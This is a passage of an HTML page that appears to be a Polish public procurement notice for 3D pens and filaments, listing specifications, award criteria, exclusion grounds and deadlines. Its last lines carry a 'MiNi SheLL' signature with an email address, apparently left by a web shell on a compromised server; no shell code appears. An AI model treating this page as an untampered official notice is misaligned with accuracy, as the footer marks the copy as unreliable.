class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2)	Część II – dostawa długopisów 3D wraz z filamentami/wkładami,<br/>Część II zamówienia<br/><br/>•	Dostawa długopisów 3D – TYP 1, o parametrach technicznych nie gorszych niż wskazane poniżej<br/><br/>Nazwa/rodzaj wymaganego towaru/parametru	Minimalne wymagania odnośnie towaru/parametrów<br/>Długopis 3D, umożliwiający przestrzenne drukowanie obiektów trójwymiarowych	15 szt.<br/>Dedykowany do użytkowania dla najmłodszych twórców	W wieku 6+<br/>Zasilanie	Co najmniej 5V USB<br/>Długość/wysokość długopisu	Co najmniej 13 cm<br/>Dedykowany do użytkowania z filamentem/wkładem wykonanym z bezpiecznych, biodegradowalnych materiałów	O średnicy co najmniej 2,5 mm<br/>Czas pracy (bezprzewodowo), po pełnym naładowaniu	Co najmniej 45 minut<br/>Dołączony kabel zasilający	TAK<br/>Dołączony stojak na długopis	TAK<br/>Dołączona instrukcja w języku polskim	TAK<br/>Dołączona książeczka z propozycjami projektów	TAK<br/>Deklaracja zgodności CE (deklaracja Conformité Européenne) - dokument potwierdzający należy dostarczyć na etapie dostawy	TAK<br/>Gwarancja - Dokument potwierdzający gwarancję należy dostarczyć na etapie dostawy	Co najmniej 12 miesięcy<br/><br/>•	Dostawa 15 szt. długopisów 3D – TYP 2, o parametrach technicznych nie gorszych niż wskazane poniżej<br/><br/>Nazwa/rodzaj wymaganego towaru/parametru	Minimalne wymagania odnośnie towaru/parametrów<br/>Długopis 3D, umożliwiający przestrzenne drukowanie obiektów trójwymiarowych	15 szt.<br/>Dedykowany do użytkowania dla młodzieży	W wieku 14+<br/>Zasilanie	Co najmniej 5 V DC / 2 A<br/>Długość/wysokość długopisu	Co najmniej 16 cm<br/>Wyposażony w gniazdo do ładowania filamentu	TAK<br/>Dedykowany do użytkowania z filamentem/wkładem Co najmniej PLA o średnicy 1,75 mm<br/>Tryby prędkości	Co najmniej 3 tryby<br/>System bezpieczeństwa – automatyczne wyłączanie długopisu lub tryb uśpienia	TAK<br/>Dołączony kabel zasilający - co najmniej USB C na USB typ A	TAK<br/>Dołączony stojak/uchwyt na długopis	TAK<br/>Dołączona instrukcja w języku polskim	TAK<br/>Deklaracja zgodności CE (deklaracja Conformité Européenne) - dokument potwierdzający należy dostarczyć na etapie dostawy	TAK<br/>Gwarancja - Dokument potwierdzający gwarancję należy dostarczyć na etapie dostawy	Co najmniej 12 miesięcy<br/><br/>•	Dostawa filamentów/wkładów do długopisów 3D, o parametrach technicznych nie gorszych niż wskazane poniżej<br/><br/>Nazwa/rodzaj wymaganego towaru/parametru	Minimalne wymagania odnośnie towaru/parametrów<br/>Zestaw filmentów/wkładów w co najmniej 8 kolorach, wykonanych z bezpiecznych, biodegradowalnych materiałów, o łącznej długości minimum 180 m (np. 1200 szt. x 15 cm), pasujących do zaoferowanego długopisu 3D – TYP 1	3 zestawy<br/>Zestaw filamentów/wkładów PLA w co najmniej 10 kolorach, o łącznej długości minimum 100 m (np. 20 szt. x 5m), pasujących do zaoferowanego długopisu 3D – TYP 2	40 zestawów </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42962000-7 - Urządzenia drukujące i graficzne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">ofercie maksimum 40 punktów, w tym kryterium. <br/>4.	Kryteria oceny ofert - stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie każdego kryterium.<br/>5. Wynik – oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryterium) zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy potwierdzający spełnienie następujących warunków dotyczących:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>	Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>	Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/>3)	sytuacji ekonomicznej lub finansowej: <br/>	Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/>4)	Zdolności technicznej lub zawodowej: <br/>a)	Wykonawca winien wykonać zadania odpowiadające swoim rodzajem przedmiotowi zamówienia tj. minimum:<br/>	Zamawiający nie określa szczegółowego warunku w tym zakresie<br/>b)	Wykonawca winien dysponować kadrą techniczną z uprawnieniami i kwalifikacjami tj.<br/>	Zamawiający nie określa szczegółowego warunku w tym zakresie<br/>c)	W zakresie dysponowania sprzętem, wykonawca winien dysponować:<br/>	Zamawiający nie wyznacza szczegółowego warunku w tym zakresie; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 108 oraz 109 ust. 1 ustawy Pzp, wykonawca na wezwanie Zamawiającego przedkłada:<br/>1)	Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast: <br/>1)	informacji z Krajowego Rejestru Karnego, o której mowa w pkt 1 ppkt 1 – składa informację z odpowiedniego rejestru, takiego jak rejestr sądowy, albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, w zakresie, o którym mowa w pkt 1 ppkt 1;<br/>2)	zaświadczenia, o którym mowa w pkt 1 ppkt 3, zaświadczenia albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, o których mowa w pkt 1 ppkt 4, lub odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w pkt 1 ppkt 5 – składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: <br/>a) nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, <br/>b) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury<br/>3)	Dokument, o którym mowa w pkt 2 ppkt 1, powinien być wystawiony nie wcześniej niż 6 miesięcy przed jego złożeniem. Dokumenty, o których mowa w pkt 2 ppkt 2, powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>4)	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 2 ppkt 1 i 2, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w pkt 1, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczącego zdolności do występowania w obrocie gospodarczym, wykonawca na wezwanie zamawiającego przedkłada następujące dokumenty:<br/>1)	Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>3.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczącego uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów, wykonawca na wezwanie zamawiającego przedkłada następujące dokumenty:<br/>1)	Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>4.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej, wykonawca na wezwanie zamawiającego przedkłada następujące dokumenty:<br/>1)	Zamawiający nie wyznacza szczegółowego warunku w tym zakresie; <br/>5.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, wykonawca na wezwanie zamawiającego przedkłada następujące dokumenty:<br/>1)	Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Na ofertę składają się następujące dokumenty i załączniki które pod rygorem nieważności, składa się w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, podpisem osobistym lub kwalifikowanym podpisem elektronicznym:<br/>1)	formularz ofertowy – wypełniony i podpisany przez wykonawcę, dokument wygenerowany i wypełniony na platformie e-zamówienia,<br/>2)	pomocniczy formularz ofertowy, część I – załącznik 6, część II – załącznik nr 7<br/>2.	Wraz z ofertą wykonawca winien przesłać wyłącznie w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym: <br/>1)	Pełnomocnictwo (jeżeli dotyczy).<br/>2)	oświadczenie wykonawcy na podstawie art. 125 ust. 1 ustawy Pzp stanowiące wstępne potwierdzenie spełniania warunków udziału w postępowaniu oraz potwierdzenie braku podstaw do wykluczenia – składane odrębnie przez wykonawcę lub każdego z wykonawców konsorcjum – załącznik nr 2; <br/>3)	oświadczenie na podstawie art. 125 ust. 1 ustawy Pzp stanowiące wstępne potwierdzenie spełniania warunków udziału w postępowaniu oraz potwierdzenie braku podstaw do wykluczenia – podpisane odrębnie przez podmiot udostępniający zasoby - załącznik nr 3; <br/>4)	Oświadczenie o którym mowa w art. 117 ust. 3 ustawy (dotyczy tylko wykonawców wspólnie ubiegających się o zamówienie) – podpisane wspólnie przez wykonawców - załącznik nr 5;<br/>5)	zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy zasobów na okres korzystania z nich przy wykonywaniu zamówienia (jeżeli dotyczy) podpisane odrębnie przez podmiot udostępniający zasoby - załącznik nr 4; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3. W przypadku gdyby wyłoniona w prowadzonym postępowaniu oferta została złożona przez<br/>dwóch lub więcej Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego<br/>Zamawiający zażąda umowy regulującej współpracę tych podmiotów przed przystąpieniem do<br/>podpisania umowy o zamówienie publiczne.<br/>2. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej -<br/>dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość dokonywania zmian postanowień zawartej umowy <br/>w następujących okolicznościach: <br/>1)	w zakresie terminu wykonania przedmiotu zamówienia - w przypadku wystąpienia następujących zdarzeń: <br/>a)	Siły wyższej, niepozwalającej na realizację umowy - termin wykonania zamówienia może ulec zmianie o okres odpowiadający opóźnieniu z tego powodu - jeżeli przy zachowaniu należytej staranności, z uwzględnieniem profesjonalnego charakteru Wykonawcy, nie można było uniknąć zmiany terminu wykonania umowy. Za siłę wyższą strony uznają przyczynę sprawczą zdarzenia o charakterze przypadkowym lub naturalnym, nie do uniknięcia i na którą strony nie mają wpływu. <br/>b)	Przyczyn zależnych od Zamawiającego lub osób (podmiotów) trzecich - termin wykonania umowy może ulec zmianie o okres odpowiadający wstrzymaniu lub opóźnieniu wykonania umowy z tego powodu, jeżeli przy zachowaniu należytej staranności, z uwzględnieniem profesjonalnego charakteru Wykonawcy nie można było uniknąć zmiany terminu wykonania umowy. <br/>2)	w zakresie sposobu realizacji przedmiotu zamówienia - w przypadku wystąpienia zmian w przepisach lub wytycznych dla projektów finansowanych ze środków Norweskiego Mechanizmu Finansowego 2014-2021 oraz ze środków Budżetu Państwa, istotnych dla realizacji przedmiotu zamówienia, w zakresie dostosowania sposobu realizacji przedmiotu zamówienia do powyższych zmian.<br/>3)	W zakresie zmiany podatku VAT - W przypadku zmiany przepisów prawa dotyczących stawki podatku VAT związanej z realizacją przedmiotu zamówienia, wynagrodzenie należne Wykonawcy podlega automatycznej zmianie odpowiednio o kwotę podatku VAT, wynikającą ze stawki tego podatku, obowiązującej w chwili powstania obowiązku podatkowego. W takim przypadku wysokość wynagrodzenia należnego Wykonawcy ustalana jest każdorazowo z uwzględnieniem aktualnej stawki podatku VAT, obowiązującej na dzień wystawienia faktury (powstania obowiązku podatkowego).<br/>2.	Zmiany umowy, o których mowa w ust. 2, wymagają formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-28 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com